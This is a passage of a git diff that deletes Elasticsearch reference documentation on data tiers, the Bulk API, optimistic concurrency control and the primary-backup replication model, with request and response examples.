- -[discrete] -[[warm-tier]] -=== Warm tier - -Time series data can move to the warm tier once it is being queried less frequently -than the recently-indexed data in the hot tier. -The warm tier typically holds data from recent weeks. -Updates are still allowed, but likely infrequent. -Nodes in the warm tier generally don't need to be as fast as those in the hot tier. -For resiliency, indices in the warm tier should be configured to use one or more replicas. - -[discrete] -[[cold-tier]] -=== Cold tier - -Once data is no longer being updated, it can move from the warm tier to the cold tier where it -stays for the rest of its life. -The cold tier is still a responsive query tier, but data in the cold tier is not normally updated. -As data transitions into the cold tier it can be compressed and shrunken. -For resiliency, indices in the cold tier can rely on -<>, eliminating the need for replicas. - -[discrete] -[[data-tier-allocation]] -=== Data tier index allocation - -When you create an index, by default {es} sets -<> -to `data_content` to automatically allocate the index shards to the content tier. - -When {es} creates an index as part of a <>, -by default {es} sets -<> -to `data_hot` to automatically allocate the index shards to the hot tier. - -You can override the automatic tier-based allocation by specifying -<> -settings in the create index request or index template that matches the new index. - -You can also explicitly set `index.routing.allocation.include._tier_preference` -to opt out of the default tier-based allocation. -If you set the tier preference to `null`, {es} ignores the data tier roles during allocation. - -[discrete] -[[data-tier-migration]] -=== Automatic data tier migration - -{ilm-init} automatically transitions managed -indices through the available data tiers using the <> action. -By default, this action is automatically injected in every phase. -You can explicitly specify the migrate action to override the default behavior, -or use the <> to manually specify allocation rules. diff --git a/docs/reference/docs.asciidoc b/docs/reference/docs.asciidoc deleted file mode 100644 index a860bfc42a0..00000000000 --- a/docs/reference/docs.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ -[[docs]] -== Document APIs - -This section starts with a short introduction to Elasticsearch's <>, followed by a -detailed description of the following CRUD APIs: - -.Single document APIs -* <> -* <> -* <> -* <> - -.Multi-document APIs -* <> -* <> -* <> -* <> -* <> - -NOTE: All CRUD APIs are single-index APIs. The `index` parameter accepts a single -index name, or an `alias` which points to a single index. - -include::docs/data-replication.asciidoc[] - -include::docs/index_.asciidoc[] - -include::docs/get.asciidoc[] - -include::docs/delete.asciidoc[] - -include::docs/delete-by-query.asciidoc[] - -include::docs/update.asciidoc[] - -include::docs/update-by-query.asciidoc[] - -include::docs/multi-get.asciidoc[] - -include::docs/bulk.asciidoc[] - -include::docs/reindex.asciidoc[] - -include::docs/termvectors.asciidoc[] - -include::docs/multi-termvectors.asciidoc[] - -include::docs/refresh.asciidoc[] - -include::docs/concurrency-control.asciidoc[] diff --git a/docs/reference/docs/bulk.asciidoc b/docs/reference/docs/bulk.asciidoc deleted file mode 100644 index 4c812bbc669..00000000000 --- a/docs/reference/docs/bulk.asciidoc +++ /dev/null @@ -1,752 +0,0 @@ -[[docs-bulk]] -=== Bulk API -++++ -Bulk -++++ - -Performs multiple indexing or delete operations in a single API call. 
-This reduces overhead and can greatly increase indexing speed. - -[source,console] --------------------------------------------------- -POST _bulk -{ "index" : { "_index" : "test", "_id" : "1" } } -{ "field1" : "value1" } -{ "delete" : { "_index" : "test", "_id" : "2" } } -{ "create" : { "_index" : "test", "_id" : "3" } } -{ "field1" : "value3" } -{ "update" : {"_id" : "1", "_index" : "test"} } -{ "doc" : {"field2" : "value2"} } --------------------------------------------------- - -[[docs-bulk-api-request]] -==== {api-request-title} - -`POST /_bulk` - -`POST //_bulk` - -[[docs-bulk-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the following -<> for the target data stream, index, -or index alias: - -** To use the `create` action, you must have the `create_doc`, `create`, -`index`, or `write` index privilege. Data streams support only the `create` -action. - -** To use the `index` action, you must have the `create`, `index`, or `write` -index privilege. - -** To use the `delete` action, you must have the `delete` or `write` index -privilege. - -** To use the `update` action, you must have the `index` or `write` index -privilege. - -** To automatically create a data stream or index with a bulk API request, you -must have the `auto_configure`, `create_index`, or `manage` index privilege. - -* Automatic data stream creation requires a matching index template with data -stream enabled. See <>. - -[[docs-bulk-api-desc]] -==== {api-description-title} - -Provides a way to perform multiple `index`, `create`, `delete`, and `update` actions in a single request. - -The actions are specified in the request body using a newline delimited JSON (NDJSON) structure: - -[source,js] --------------------------------------------------- -action_and_meta_data\n -optional_source\n -action_and_meta_data\n -optional_source\n -.... -action_and_meta_data\n -optional_source\n --------------------------------------------------- -// NOTCONSOLE - -The `index` and `create` actions expect a source on the next line, -and have the same semantics as the `op_type` parameter in the standard index API: -`create` fails if a document with the same ID already exists in the target, -`index` adds or replaces a document as necessary. - -NOTE: <> support only the `create` action. To update -or delete a document in a data stream, you must target the backing index -containing the document. See <>. - -`update` expects that the partial doc, upsert, -and script and its options are specified on the next line. - -`delete` does not expect a source on the next line and -has the same semantics as the standard delete API. - -[NOTE] -==== -The final line of data must end with a newline character `\n`. -Each newline character may be preceded by a carriage return `\r`. -When sending requests to the `_bulk` endpoint, -the `Content-Type` header should be set to `application/x-ndjson`. -==== - -Because this format uses literal `\n`'s as delimiters, -make sure that the JSON actions and sources are not pretty printed. - -If you provide a `` in the request path, -it is used for any actions that don't explicitly specify an `_index` argument. - -A note on the format: The idea here is to make processing of this as -fast as possible. As some of the actions are redirected to other -shards on other nodes, only `action_meta_data` is parsed on the -receiving node side. 
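As noted above, when the request path includes a target, any action that omits `_index` inherits it. A minimal sketch, with an arbitrary index name and field values:

[source,console]
--------------------------------------------------
POST /test/_bulk
{ "index" : { "_id" : "1" } }
{ "field1" : "value1" }
{ "create" : { "_id" : "2" } }
{ "field1" : "value2" }
--------------------------------------------------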
- -Client libraries using this protocol should try and strive to do -something similar on the client side, and reduce buffering as much as -possible. - -There is no "correct" number of actions to perform in a single bulk request. -Experiment with different settings to find the optimal size for your particular workload. - -When using the HTTP API, make sure that the client does not send HTTP chunks, -as this will slow things down. - -[discrete] -[[bulk-clients]] -===== Client support for bulk requests - -Some of the officially supported clients provide helpers to assist with -bulk requests and reindexing: - -Go:: - - See https://github.com/elastic/go-elasticsearch/tree/master/_examples/bulk#indexergo[esutil.BulkIndexer] - -Perl:: - - See https://metacpan.org/pod/Search::Elasticsearch::Client::5_0::Bulk[Search::Elasticsearch::Client::5_0::Bulk] - and https://metacpan.org/pod/Search::Elasticsearch::Client::5_0::Scroll[Search::Elasticsearch::Client::5_0::Scroll] - -Python:: - - See https://elasticsearch-py.readthedocs.org/en/master/helpers.html[elasticsearch.helpers.*] - -JavaScript:: - - See {jsclient-current}/client-helpers.html[client.helpers.*] - -.NET:: - See https://www.elastic.co/guide/en/elasticsearch/client/net-api/current/indexing-documents.html#bulkall-observable[`BulkAllObservable`] - -[discrete] -[[bulk-curl]] -===== Submitting bulk requests with cURL - -If you're providing text file input to `curl`, you *must* use the -`--data-binary` flag instead of plain `-d`. The latter doesn't preserve -newlines. Example: - -[source,js] --------------------------------------------------- -$ cat requests -{ "index" : { "_index" : "test", "_id" : "1" } } -{ "field1" : "value1" } -$ curl -s -H "Content-Type: application/x-ndjson" -XPOST localhost:9200/_bulk --data-binary "@requests"; echo -{"took":7, "errors": false, "items":[{"index":{"_index":"test","_type":"_doc","_id":"1","_version":1,"result":"created","forced_refresh":false}}]} --------------------------------------------------- -// NOTCONSOLE -// Not converting to console because this shows how curl works - -[discrete] -[[bulk-optimistic-concurrency-control]] -===== Optimistic concurrency control - -Each `index` and `delete` action within a bulk API call may include the -`if_seq_no` and `if_primary_term` parameters in their respective action -and meta data lines. The `if_seq_no` and `if_primary_term` parameters control -how operations are executed, based on the last modification to existing -documents. See <> for more details. - - -[discrete] -[[bulk-versioning]] -===== Versioning - -Each bulk item can include the version value using the -`version` field. It automatically follows the behavior of the -index / delete operation based on the `_version` mapping. It also -support the `version_type` (see <>). - -[discrete] -[[bulk-routing]] -===== Routing - -Each bulk item can include the routing value using the -`routing` field. It automatically follows the behavior of the -index / delete operation based on the `_routing` mapping. - -NOTE: Data streams do not support custom routing. Instead, target the -appropriate backing index for the stream. - -[discrete] -[[bulk-wait-for-active-shards]] -===== Wait for active shards - -When making bulk calls, you can set the `wait_for_active_shards` -parameter to require a minimum number of shard copies to be active -before starting to process the bulk request. See -<> for further details and a usage -example. 
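For instance, the following request (a sketch; the shard-copy count is arbitrary) asks {es} to wait until at least two copies of each affected shard are active before processing the actions:

[source,console]
--------------------------------------------------
POST /test/_bulk?wait_for_active_shards=2
{ "index" : { "_id" : "1" } }
{ "field1" : "value1" }
--------------------------------------------------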
- -[discrete] -[[bulk-refresh]] -===== Refresh - -Control when the changes made by this request are visible to search. See -<>. - -NOTE: Only the shards that receive the bulk request will be affected by -`refresh`. Imagine a `_bulk?refresh=wait_for` request with three -documents in it that happen to be routed to different shards in an index -with five shards. The request will only wait for those three shards to -refresh. The other two shards that make up the index do not -participate in the `_bulk` request at all. - -[discrete] -[[bulk-security]] -===== Security - -See <>. - -[[docs-bulk-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Name of the data stream, index, or index alias to perform bulk actions -on. - -[[docs-bulk-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pipeline] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -`require_alias`:: -(Optional, Boolean) -If `true`, the request's actions must target an <>. -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -`timeout`:: -+ --- -(Optional, <>) -Period each action waits for the following operations: - -* <> -* <> updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[bulk-api-request-body]] -==== {api-request-body-title} -The request body contains a newline-delimited list of `create`, `delete`, `index`, -and `update` actions and their associated source data. - -`create`:: -(Optional, string) -Indexes the specified document if it does not already exist. -The following line must contain the source data to be indexed. -+ --- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-index] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-id] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-require-alias] --- - -`delete`:: -(Optional, string) -Removes the specified document from the index. -+ --- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-index] - -`_id`:: -(Required, string) -The document ID. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-require-alias] --- - -`index`:: -(Optional, string) -Indexes the specified document. -If the document exists, replaces the document and increments the version. -The following line must contain the source data to be indexed. -+ --- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-index] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-id] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-require-alias] --- - -`update`:: -(Optional, string) -Performs a partial document update. -The following line must contain the partial document and update options. -+ --- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-index] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-id] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bulk-require-alias] --- - -`doc`:: -(Optional, object) -The partial document to index. 
-Required for `update` operations. - -``:: -(Optional, object) -The document source to index. -Required for `create` and `index` operations. - -[role="child_attributes"] -[[bulk-api-response-body]] -==== {api-response-body-title} - -The bulk API's response contains the individual results of each operation in the -request, returned in the order submitted. The success or failure of an -individual operation does not affect other operations in the request. - -[[bulk-partial-responses]] -.Partial responses -**** -To ensure fast responses, the bulk API will respond with partial results if one -or more shards fail. See <> for more -information. -**** - -`took`:: -(integer) -How long, in milliseconds, it took to process the bulk request. - -`errors`:: -(Boolean) -If `true`, one or more of the operations in the bulk request did not complete -successfully. - -`items`:: -(array of objects) -Contains the result of each operation in the bulk request, in the order they -were submitted. -+ -.Properties of `items` objects -[%collapsible%open] -==== -:: -(object) -The parameter name is an action associated with the operation. Possible values -are `create`, `delete`, `index`, and `update`. -+ -The parameter value is an object that contains information for the associated -operation. -+ -.Properties of `` -[%collapsible%open] -===== -`_index`:: -(string) -Name of the index associated with the operation. If the operation targeted a -data stream, this is the backing index into which the document was written. - -`_type`:: -(string) -The document type associated with the operation. {es} indices now support a -single document type: `_doc`. See <>. - -`_id`:: -(integer) -The document ID associated with the operation. - -`_version`:: -(integer) -The document version associated with the operation. The document version is -incremented each time the document is updated. -+ -This parameter is only returned for successful actions. - -`result`:: -(string) -Result of the operation. Successful values are `created`, `deleted`, and -`updated`. -+ -This parameter is only returned for successful operations. - -`_shards`:: -(object) -Contains shard information for the operation. -+ -This parameter is only returned for successful operations. -+ -.Properties of `_shards` -[%collapsible%open] -====== -`total`:: -(integer) -Number of shards the operation attempted to execute on. - -`successful`:: -(integer) -Number of shards the operation succeeded on. - -`failed`:: -(integer) -Number of shards the operation attempted to execute on but failed. -====== - -`_seq_no`:: -(integer) -The sequence number assigned to the document for the operation. -Sequence numbers are used to ensure an older version of a document -doesn’t overwrite a newer version. See <>. -+ -This parameter is only returned for successful operations. - -`_primary_term`:: -(integer) -The primary term assigned to the document for the operation. -See <>. -+ -This parameter is only returned for successful operations. - -`status`:: -(integer) -HTTP status code returned for the operation. - -`error`:: -(object) -Contains additional information about the failed operation. -+ -The parameter is only returned for failed operations. -+ -.Properties of `error` -[%collapsible%open] -====== -`type`:: -(string) -Error type for the operation. - -`reason`:: -(string) -Reason for the failed operation. - -`index_uuid`:: -(string) -The universally unique identifier (UUID) of the index associated with the failed -operation. 
- -`shard`:: -(string) -ID of the shard associated with the failed operation. - -`index`:: -(string) -Name of the index associated with the failed operation. If the operation -targeted a data stream, this is the backing index into which the document was -attempted to be written. -====== -===== -==== - -[[docs-bulk-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _bulk -{ "index" : { "_index" : "test", "_id" : "1" } } -{ "field1" : "value1" } -{ "delete" : { "_index" : "test", "_id" : "2" } } -{ "create" : { "_index" : "test", "_id" : "3" } } -{ "field1" : "value3" } -{ "update" : {"_id" : "1", "_index" : "test"} } -{ "doc" : {"field2" : "value2"} } --------------------------------------------------- - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "took": 30, - "errors": false, - "items": [ - { - "index": { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "status": 201, - "_seq_no" : 0, - "_primary_term": 1 - } - }, - { - "delete": { - "_index": "test", - "_type": "_doc", - "_id": "2", - "_version": 1, - "result": "not_found", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "status": 404, - "_seq_no" : 1, - "_primary_term" : 2 - } - }, - { - "create": { - "_index": "test", - "_type": "_doc", - "_id": "3", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "status": 201, - "_seq_no" : 2, - "_primary_term" : 3 - } - }, - { - "update": { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": 2, - "result": "updated", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "status": 200, - "_seq_no" : 3, - "_primary_term" : 4 - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 30/"took": $body.took/] -// TESTRESPONSE[s/"index_uuid": .../"index_uuid": $body.items.3.update.error.index_uuid/] -// TESTRESPONSE[s/"_seq_no" : 0/"_seq_no" : $body.items.0.index._seq_no/] -// TESTRESPONSE[s/"_primary_term" : 1/"_primary_term" : $body.items.0.index._primary_term/] -// TESTRESPONSE[s/"_seq_no" : 1/"_seq_no" : $body.items.1.delete._seq_no/] -// TESTRESPONSE[s/"_primary_term" : 2/"_primary_term" : $body.items.1.delete._primary_term/] -// TESTRESPONSE[s/"_seq_no" : 2/"_seq_no" : $body.items.2.create._seq_no/] -// TESTRESPONSE[s/"_primary_term" : 3/"_primary_term" : $body.items.2.create._primary_term/] -// TESTRESPONSE[s/"_seq_no" : 3/"_seq_no" : $body.items.3.update._seq_no/] -// TESTRESPONSE[s/"_primary_term" : 4/"_primary_term" : $body.items.3.update._primary_term/] - -[discrete] -[[bulk-update]] -===== Bulk update example - -When using the `update` action, `retry_on_conflict` can be used as a field in -the action itself (not in the extra payload line), to specify how many -times an update should be retried in the case of a version conflict. - -The `update` action payload supports the following options: `doc` -(partial document), `upsert`, `doc_as_upsert`, `script`, `params` (for -script), `lang` (for script), and `_source`. See update documentation for details on -the options. 
Example with update actions: - -[source,console] --------------------------------------------------- -POST _bulk -{ "update" : {"_id" : "1", "_index" : "index1", "retry_on_conflict" : 3} } -{ "doc" : {"field" : "value"} } -{ "update" : { "_id" : "0", "_index" : "index1", "retry_on_conflict" : 3} } -{ "script" : { "source": "ctx._source.counter += params.param1", "lang" : "painless", "params" : {"param1" : 1}}, "upsert" : {"counter" : 1}} -{ "update" : {"_id" : "2", "_index" : "index1", "retry_on_conflict" : 3} } -{ "doc" : {"field" : "value"}, "doc_as_upsert" : true } -{ "update" : {"_id" : "3", "_index" : "index1", "_source" : true} } -{ "doc" : {"field" : "value"} } -{ "update" : {"_id" : "4", "_index" : "index1"} } -{ "doc" : {"field" : "value"}, "_source": true} --------------------------------------------------- - -[discrete] -[[bulk-failures-ex]] -===== Example with failed actions - -The following bulk API request includes operations that update non-existent -documents. - -[source,console] ----- -POST /_bulk -{ "update": {"_id": "5", "_index": "index1"} } -{ "doc": {"my_field": "foo"} } -{ "update": {"_id": "6", "_index": "index1"} } -{ "doc": {"my_field": "foo"} } -{ "create": {"_id": "7", "_index": "index1"} } -{ "my_field": "foo" } ----- - -Because these operations cannot complete successfully, the API returns a -response with an `errors` flag of `true`. - -The response also includes an `error` object for any failed operations. The -`error` object contains additional information about the failure, such as the -error type and reason. - -[source,console-result] ----- -{ - "took": 486, - "errors": true, - "items": [ - { - "update": { - "_index": "index1", - "_type" : "_doc", - "_id": "5", - "status": 404, - "error": { - "type": "document_missing_exception", - "reason": "[_doc][5]: document missing", - "index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA", - "shard": "0", - "index": "index1" - } - } - }, - { - "update": { - "_index": "index1", - "_type" : "_doc", - "_id": "6", - "status": 404, - "error": { - "type": "document_missing_exception", - "reason": "[_doc][6]: document missing", - "index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA", - "shard": "0", - "index": "index1" - } - } - }, - { - "create": { - "_index": "index1", - "_type" : "_doc", - "_id": "7", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "_seq_no": 0, - "_primary_term": 1, - "status": 201 - } - } - ] -} ----- -// TESTRESPONSE[s/"took": 486/"took": $body.took/] -// TESTRESPONSE[s/"_seq_no": 0/"_seq_no": $body.items.2.create._seq_no/] -// TESTRESPONSE[s/"index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA"/"index_uuid": $body.$_path/] - -To return only information about failed operations, use the -<> query parameter with an -argument of `items.*.error`. - -[source,console] ----- -POST /_bulk?filter_path=items.*.error -{ "update": {"_id": "5", "_index": "index1"} } -{ "doc": {"my_field": "baz"} } -{ "update": {"_id": "6", "_index": "index1"} } -{ "doc": {"my_field": "baz"} } -{ "update": {"_id": "7", "_index": "index1"} } -{ "doc": {"my_field": "baz"} } ----- -// TEST[continued] - -The API returns the following result. 
- -[source,console-result] ----- -{ - "items": [ - { - "update": { - "error": { - "type": "document_missing_exception", - "reason": "[_doc][5]: document missing", - "index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA", - "shard": "0", - "index": "index1" - } - } - }, - { - "update": { - "error": { - "type": "document_missing_exception", - "reason": "[_doc][6]: document missing", - "index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA", - "shard": "0", - "index": "index1" - } - } - } - ] -} ----- -// TESTRESPONSE[s/"index_uuid": "aAsFqTI0Tc2W0LCWgPNrOA"/"index_uuid": $body.$_path/] diff --git a/docs/reference/docs/concurrency-control.asciidoc b/docs/reference/docs/concurrency-control.asciidoc deleted file mode 100644 index c399f6063ab..00000000000 --- a/docs/reference/docs/concurrency-control.asciidoc +++ /dev/null @@ -1,113 +0,0 @@ -[[optimistic-concurrency-control]] -=== Optimistic concurrency control - -Elasticsearch is distributed. When documents are created, updated, or deleted, -the new version of the document has to be replicated to other nodes in the cluster. -Elasticsearch is also asynchronous and concurrent, meaning that these replication -requests are sent in parallel, and may arrive at their destination out of sequence. -Elasticsearch needs a way of ensuring that an older version of a document never -overwrites a newer version. - - -To ensure an older version of a document doesn't overwrite a newer version, every -operation performed to a document is assigned a sequence number by the primary -shard that coordinates that change. The sequence number is increased with each -operation and thus newer operations are guaranteed to have a higher sequence -number than older operations. Elasticsearch can then use the sequence number of -operations to make sure a newer document version is never overridden by -a change that has a smaller sequence number assigned to it. - -For example, the following indexing command will create a document and assign it -an initial sequence number and primary term: - -[source,console] --------------------------------------------------- -PUT products/_doc/1567 -{ - "product" : "r2d2", - "details" : "A resourceful astromech droid" -} --------------------------------------------------- - -You can see the assigned sequence number and primary term in the -`_seq_no` and `_primary_term` fields of the response: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 1 - }, - "_index": "products", - "_type": "_doc", - "_id": "1567", - "_version": 1, - "_seq_no": 362, - "_primary_term": 2, - "result": "created" -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": 362/"_seq_no": $body._seq_no/] -// TESTRESPONSE[s/"_primary_term": 2/"_primary_term": $body._primary_term/] - - -Elasticsearch keeps tracks of the sequence number and primary term of the last -operation to have changed each of the documents it stores. 
The sequence number -and primary term are returned in the `_seq_no` and `_primary_term` fields in -the response of the <>: - -[source,console] --------------------------------------------------- -GET products/_doc/1567 --------------------------------------------------- -// TEST[continued] - -returns: - -[source,console-result] --------------------------------------------------- -{ - "_index": "products", - "_type": "_doc", - "_id": "1567", - "_version": 1, - "_seq_no": 362, - "_primary_term": 2, - "found": true, - "_source": { - "product": "r2d2", - "details": "A resourceful astromech droid" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": 362/"_seq_no": $body._seq_no/] -// TESTRESPONSE[s/"_primary_term": 2/"_primary_term": $body._primary_term/] - - -Note: The <> can return the `_seq_no` and `_primary_term` -for each search hit by setting <>. - -The sequence number and the primary term uniquely identify a change. By noting down -the sequence number and primary term returned, you can make sure to only change the -document if no other change was made to it since you retrieved it. This -is done by setting the `if_seq_no` and `if_primary_term` parameters of the -<>, <>, or <>. - -For example, the following indexing call will make sure to add a tag to the -document without losing any potential change to the description or an addition -of another tag by another API: - -[source,console] --------------------------------------------------- -PUT products/_doc/1567?if_seq_no=362&if_primary_term=2 -{ - "product": "r2d2", - "details": "A resourceful astromech droid", - "tags": [ "droid" ] -} --------------------------------------------------- -// TEST[continued] -// TEST[catch: conflict] diff --git a/docs/reference/docs/data-replication.asciidoc b/docs/reference/docs/data-replication.asciidoc deleted file mode 100644 index 54bbe0ca605..00000000000 --- a/docs/reference/docs/data-replication.asciidoc +++ /dev/null @@ -1,173 +0,0 @@ - -[[docs-replication]] -=== Reading and Writing documents - -[discrete] -==== Introduction - -Each index in Elasticsearch is <> -and each shard can have multiple copies. These copies are known as a _replication group_ and must be kept in sync when documents -are added or removed. If we fail to do so, reading from one copy will result in very different results than reading from another. -The process of keeping the shard copies in sync and serving reads from them is what we call the _data replication model_. - -Elasticsearch’s data replication model is based on the _primary-backup model_ and is described very well in the -https://www.microsoft.com/en-us/research/publication/pacifica-replication-in-log-based-distributed-storage-systems/[PacificA paper] of -Microsoft Research. That model is based on having a single copy from the replication group that acts as the primary shard. -The other copies are called _replica shards_. The primary serves as the main entry point for all indexing operations. It is in charge of -validating them and making sure they are correct. Once an index operation has been accepted by the primary, the primary is also -responsible for replicating the operation to the other copies. - -This purpose of this section is to give a high level overview of the Elasticsearch replication model and discuss the implications -it has for various interactions between write and read operations. 
- -[discrete] -[[basic-write-model]] -==== Basic write model - -Every indexing operation in Elasticsearch is first resolved to a replication group using <>, -typically based on the document ID. Once the replication group has been determined, the operation is forwarded -internally to the current _primary shard_ of the group. This stage of indexing is referred to as the _coordinating stage_. - -The next stage of indexing is the _primary stage_, performed on the primary shard. The primary shard is responsible -for validating the operation and forwarding it to the other replicas. Since replicas can be offline, the primary -is not required to replicate to all replicas. Instead, Elasticsearch maintains a list of shard copies that should -receive the operation. This list is called the _in-sync copies_ and is maintained by the master node. As the name implies, -these are the set of "good" shard copies that are guaranteed to have processed all of the index and delete operations that -have been acknowledged to the user. The primary is responsible for maintaining this invariant and thus has to replicate all -operations to each copy in this set. - -The primary shard follows this basic flow: - -. Validate incoming operation and reject it if structurally invalid (Example: have an object field where a number is expected) -. Execute the operation locally i.e. indexing or deleting the relevant document. This will also validate the content of fields - and reject if needed (Example: a keyword value is too long for indexing in Lucene). -. Forward the operation to each replica in the current in-sync copies set. If there are multiple replicas, this is done in parallel. -. Once all replicas have successfully performed the operation and responded to the primary, the primary acknowledges the successful - completion of the request to the client. - -Each in-sync replica copy performs the indexing operation locally so that it has a copy. This stage of indexing is the -_replica stage_. - -These indexing stages (coordinating, primary, and replica) are sequential. To enable internal retries, the lifetime of each stage -encompasses the lifetime of each subsequent stage. For example, the coordinating stage is not complete until each primary -stage, which may be spread out across different primary shards, has completed. Each primary stage will not complete until the -in-sync replicas have finished indexing the docs locally and responded to the replica requests. - -[discrete] -===== Failure handling - -Many things can go wrong during indexing -- disks can get corrupted, nodes can be disconnected from each other, or some -configuration mistake could cause an operation to fail on a replica despite it being successful on the primary. These -are infrequent but the primary has to respond to them. - -In the case that the primary itself fails, the node hosting the primary will send a message to the master about it. The indexing -operation will wait (up to 1 minute, by <>) for the master to promote one of the replicas to be a -new primary. The operation will then be forwarded to the new primary for processing. Note that the master also monitors the -health of the nodes and may decide to proactively demote a primary. This typically happens when the node holding the primary -is isolated from the cluster by a networking issue. See <> for more details. - -Once the operation has been successfully performed on the primary, the primary has to deal with potential failures -when executing it on the replica shards. 
-This may be caused by an actual failure on the replica or by a network
-issue preventing the operation from reaching the replica (or preventing the replica from responding). All of these
-share the same end result: a replica that is part of the in-sync replica set misses an operation that is about to
-be acknowledged. In order to avoid violating the invariant, the primary sends a message to the master requesting
-that the problematic shard be removed from the in-sync replica set. Only once removal of the shard has been acknowledged
-by the master does the primary acknowledge the operation. Note that the master will also instruct another node to start
-building a new shard copy in order to restore the system to a healthy state.
-
-[[demoted-primary]]
-While forwarding an operation to the replicas, the primary will use the replicas to validate that it is still the
-active primary. If the primary has been isolated due to a network partition (or a long GC) it may continue to process
-incoming indexing operations before realizing that it has been demoted. Operations that come from a stale primary
-will be rejected by the replicas. When the primary receives a response from a replica rejecting its request because
-it is no longer the primary, it reaches out to the master and learns that it has been replaced. The
-operation is then routed to the new primary.
-
-.What happens if there are no replicas?
-************
-This is a valid scenario that can happen due to index configuration or simply
-because all the replicas have failed. In that case the primary is processing operations without any external validation,
-which may seem problematic. On the other hand, the primary cannot fail other shards on its own; it can only request that
-the master do so on its behalf. This means that the master knows that the primary is the only good copy. We are therefore
-guaranteed that the master will not promote any other (out-of-date) shard copy to be a new primary and that any operation
-indexed into the primary will not be lost. Of course, since at that point we are running with only a single copy of the
-data, physical hardware issues can still cause data loss. See <> for some mitigation options.
-************
-
-[discrete]
-==== Basic read model
-
-Reads in Elasticsearch can be anything from a lightweight lookup by ID to a heavy search request with complex
-aggregations that takes non-trivial CPU power. One of the beauties of the primary-backup model is that it keeps all
-shard copies identical (with the exception of in-flight operations). As such, a single in-sync copy is sufficient to
-serve read requests.
-
-When a read request is received by a node, that node is responsible for forwarding it to the nodes that hold the relevant shards,
-collating the responses, and responding to the client. We call that node the _coordinating node_ for that request. The basic flow
-is as follows:
-
-. Resolve the read request to the relevant shards. Note that since most searches will be sent to one or more indices,
-  they typically need to read from multiple shards, each representing a different subset of the data.
-. Select an active copy of each relevant shard from the shard replication group. This can be either the primary or
-  a replica. By default, {es} uses <> to select the shard copies.
-. Send shard-level read requests to the selected copies.
-. Combine the results and respond. Note that in the case of get-by-ID lookups, only one shard is relevant and this step can be skipped.
- -[discrete] -[[shard-failures]] -===== Shard failures - -When a shard fails to respond to a read request, the coordinating node sends the -request to another shard copy in the same replication group. Repeated failures -can result in no available shard copies. - -To ensure fast responses, the following APIs will -respond with partial results if one or more shards fail: - -* <> -* <> -* <> -* <> - -Responses containing partial results still provide a `200 OK` HTTP status code. -Shard failures are indicated by the `timed_out` and `_shards` fields of -the response header. - -[discrete] -==== A few simple implications - -Each of these basic flows determines how Elasticsearch behaves as a system for both reads and writes. Furthermore, since read -and write requests can be executed concurrently, these two basic flows interact with each other. This has a few inherent implications: - -Efficient reads:: Under normal operation each read operation is performed once for each relevant replication group. - Only under failure conditions do multiple copies of the same shard execute the same search. - -Read unacknowledged:: Since the primary first indexes locally and then replicates the request, it is possible for a - concurrent read to already see the change before it has been acknowledged. - -Two copies by default:: This model can be fault tolerant while maintaining only two copies of the data. This is in contrast to - quorum-based system where the minimum number of copies for fault tolerance is 3. - -[discrete] -==== Failures - -Under failures, the following is possible: - -A single shard can slow down indexing:: Because the primary waits for all replicas in the in-sync copies set during each operation, - a single slow shard can slow down the entire replication group. This is the price we pay for the read efficiency mentioned above. - Of course a single slow shard will also slow down unlucky searches that have been routed to it. - -Dirty reads:: An isolated primary can expose writes that will not be acknowledged. This is caused by the fact that an isolated - primary will only realize that it is isolated once it sends requests to its replicas or when reaching out to the master. - At that point the operation is already indexed into the primary and can be read by a concurrent read. Elasticsearch mitigates - this risk by pinging the master every second (by default) and rejecting indexing operations if no master is known. - -[discrete] -==== The Tip of the Iceberg - -This document provides a high level overview of how Elasticsearch deals with data. Of course, there is much much more -going on under the hood. Things like primary terms, cluster state publishing, and master election all play 